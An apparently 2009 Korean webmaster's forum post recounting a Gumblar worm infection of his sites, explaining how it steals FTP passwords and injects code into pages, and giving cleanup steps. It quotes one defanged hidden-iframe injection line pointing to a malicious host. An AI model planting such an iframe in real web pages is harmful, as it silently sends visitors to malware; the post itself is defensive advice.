몇몇 분이 질문게시판에 증상을 올리셨고 제가 직접 겪어본 일이기에 팁으로 올립니다.

 

어느 날 갑자기 멀쩡하던 홈페이지 레이아웃이 엉망으로 바뀌면서 관리자 페이지도 못들어가는 증상이 발생하여 index.php 소스를 내려받아 코드를 살펴보니 원래는 없던 코드가 아이프레임 방식으로 히든처리되어 심어져 있었습니다.

 

코드는 <iframe src="./hxxxxxp://bestfindaloan.cn:8080/index.php" width=116 height=188 style="visibility: hidden"></iframe> 식입니다. 주소는 매우 다양합니다 (6월6일자 보고에 의하면 48,000개 도메인)  <= 바이러스 감염될 수 있으니 위 주소에 접속은 하지 마세요.

 

처음 접하는 순간 뒤통수를 얻어맞은 것처럼 멍해졌지요. 완전히 안방을 내준 꼴...

 

제가 관리하는 홈페이지(호스팅사 동일)가 두개인데 예전에 테크노트로 만든 교회홈페이지 하나와 근래에 XE로 만든 개인 홈페이지가 그 것인데 하루 간격으로 동일한 증상을 보였습니다.

 

XE로 만든 홈페이지는 일단 index.php에 삽입된 아이프레임 코드를 삭제하고 업로드 한다음 FTP 패스워드를 바꾸니까 ( 아직 안심은 안됩니다만) 임시해결은 되었습니다.

그런데 테크노트로 만든 홈페이지는 지금까지 사태가 심각합니다.

문제발견 당시 index.html을 원상 복구하니 정상으로 돌아와서  "짜식 별거 아니구만" 생각하고 농촌봉사를 몇 일 갔다온 사이 사태가 심각하게 진행된 것 같습니다.  index, default, main, home 이 들어간 모든 파일이 변조되고 난리가 아닌 겁니다.

부랴부랴 변조된 날짜 추적해서 원상복구하고 안심하는 사이 다음 날 또 같은 증상이 재발하는겁니다.

할 수 없이 호스팅업체에 문제 발생이전 백업본으로 복구를 요청했는데 백업본도 이미 감염된 상태라는 답변입니다.

 

원인추적 : 첫째, 제 로컬PC(사무실)에 스파이웨어가 심어져서 FTP 아이디와 패스워드를 빼갔다. (알약을 몇번 돌렸는데 깨끗합니다)

                   둘째, 호스팅사의 동일 서버에 있는 다른 사이트가 뚤렸다.

                   셋째, 집에서 아이들이 쓰는 PC로 FTP작업을 한적이 있는데 그 곳에서 뚤렸다. 는 것으로 압축

 

지금 해결된 상태는 아니지만 원인과 해결의 실마리는 찾았기에 팁으로 올립니다.

 

1. 바이러스 명 : 신종 지능형 웜바이러스 Gumblar (일명 제노바이러스)

                            2009년3월에 처음 발견되어 급속히 번지고 있으며 현존하는 바이러스중 가장 악질적인 바이러스 (ZDnet)

                            공격유형이 최근 최악의 웜바이러스로 불리는 Conficker 바이러스보다 치명적

                            Google의 검색결과를 조작시켜 악성코드를 내포한 사이트로 유도하는 기능도 있슴

                            익스플로러 브라우저 자체에 악성코드를 주입시켜 웹트래픽유발

 

2. 감염경로

 

가. 퍼스널컴퓨터 1차 감염

위 바이러스에 감염된 사이트에 접속하면 바이러스를 만든 공격자의 홈페이지(아이프레임에 심어진 사이트 : 최초에는 gumblar.cn 이었는데 지금은 수만개의 숙주사이트-합법적이고 정상적인 사이트임-가 존재)로 리다이렉트되고 방문자의 퍼스널컴퓨터로 감염된 PDF파일을 내려받게 한다. 감염된 PDF파일는 아크로뱃리더 또는 플래시플레이어의 취약점을 이용하여 방문자의 퍼스널컴퓨터에 대한 접근권한을 취득한다. 그 후 바이러스는 FTP 클라이언트(파일질라,드림위버,나모,CuteFTP,WsFtp,알FTP 등)의 패스워드를 빼내 공격자의 호스트로 보내고 때로는 윈도우프롬프트, 레지스트리에디터, 안티바이러스프로그램을 무력하게 만든다.

 

나. 서버 2차 감염

공격자의 호스트사이트는 퍼스널컴퓨터에서 획득한 패스워드를 이용하여 FTP를 통해 멋이감 웹사이트에 접속해서 다량의 파일을 내려받아 악성코드를 주입하고 다시 업로드시킨다. 그코드는 HTML,PHP,JavaScript,ASP,ASPx 등 body 태그가 포함된 파일에 삽입된다. 삽입된 악성코드는 그 코드를 실행하는 컴퓨터(방문자의 퍼스널컴퓨터)를 감염시키도록 자바스크립트를 포함하고 있다. 여기에 더하여 몇몇 파일(위에서 언급한 index,main,home,default) 에는 아이프레임을 삽입시킨다. 바이러스는 또한 .htacess 및 HOSTS 파일을 변조시키며 images 폴더에 images.php 파일을 생성시킨다. 감염은 서버전체로 퍼지는 것은 아니고 패스워드가 탈취된 사이트에서만 일어난다.

 

위 가항과 나항의 모든 과정은 프로그램에 의해 자동 진행된다.

 

3. 감지 및 처방

 

가. 퍼스널컴퓨터

바이러스 감염의 시작점이기때문에 퍼스널컴퓨터부터 손봐야 합니다. 먼저 안티스파이웨어 Tool로 스캔을 합니다. 알약이나 Kaspersky으로는 검출이 안됩니다. 검출 가능한 툴은 Malewarebytes(무료버전) 이나 HijackThis 입니다. 저는 Malewarebytes로 돌려보니 알약으로는 깨끗했던 사무실 컴퓨터가 24개의 Trojan.BHO, Trojan.Games Thief, Trojan Backboor 등 다양하게 점령당했더군요. 일단 치료후 컴퓨터가 깨끗해진 것이 확인되면 반드시 FTP 패스워드를 변경하고 재감염을 막기 위해서는 접속편의를 위해  FTP 클라이언트에 패스워드를 저장해놓고 쓰는 방식은 하지 말아야 합니다. 번거롭더라도 그때 그때 패스워드를 입력해서 접속하세요. 

 

나. 서버

서버는 완벽히 깨끗이 정리되어야 합니다. 단 한개의 감염된 파일이 남아 있어도 재감염됩니다. 가장 권장하는 방법은 깨끗한 백업본이 있다면 서버에 있는 파일을 싹 지우고 백업본으로 대체하는 것이고, 아니면 서버에 있는 파일을 내려받아 안티바이러스 프로그램으로 치료후에 재업로드 하는 것입니다.  아이프레임으로 심어진 악성 코드는 수작업으로 리무브시켜야합니다.

 

이상입니다.

 

cgi?pepsi로 사이트 검색해보면 감염된채로 있는 사이트 수두룩하게 나옵니다. 아이프레임코드가 화면에 그대로 노출되는 사이트도 있고 그렇네요. 보안패치가 안되어 있을 경우 특정 웹사이트를 열기만 해도 감염이 됩니다. 다행인 것은 바이러스를 유포하는 근원적인 호스트가 현재는 비활성이라는데 언제 활동을 재개할 지 모른다고 합니다. 그렇더라도 안전을 위해서 감염된 사이트에 안들어가는게 상책인데 악성코드가 숨김속성이어서 어떤 사이트가 감염되었고 어떤 사이트가 정상인지 구별하기가 힘들다는 것입니다.

언제 내 사이트도 숙주가 되어 바이러스 유포지로 전락할지 모르니 걱정이네요. 잠시 그 상황에 갔었지만..

 

실시간 바이러스 감시는 항상 켜두시고,

FTP계정 패스워드는 특수문자를 포함하여 변경,

FTP 클라이언트의 비밀번호 저장기능 체크해제,

어도비사의 아크로뱃리더와 플래시플레이어 보안패치하세요.

 

도움이 되시기를..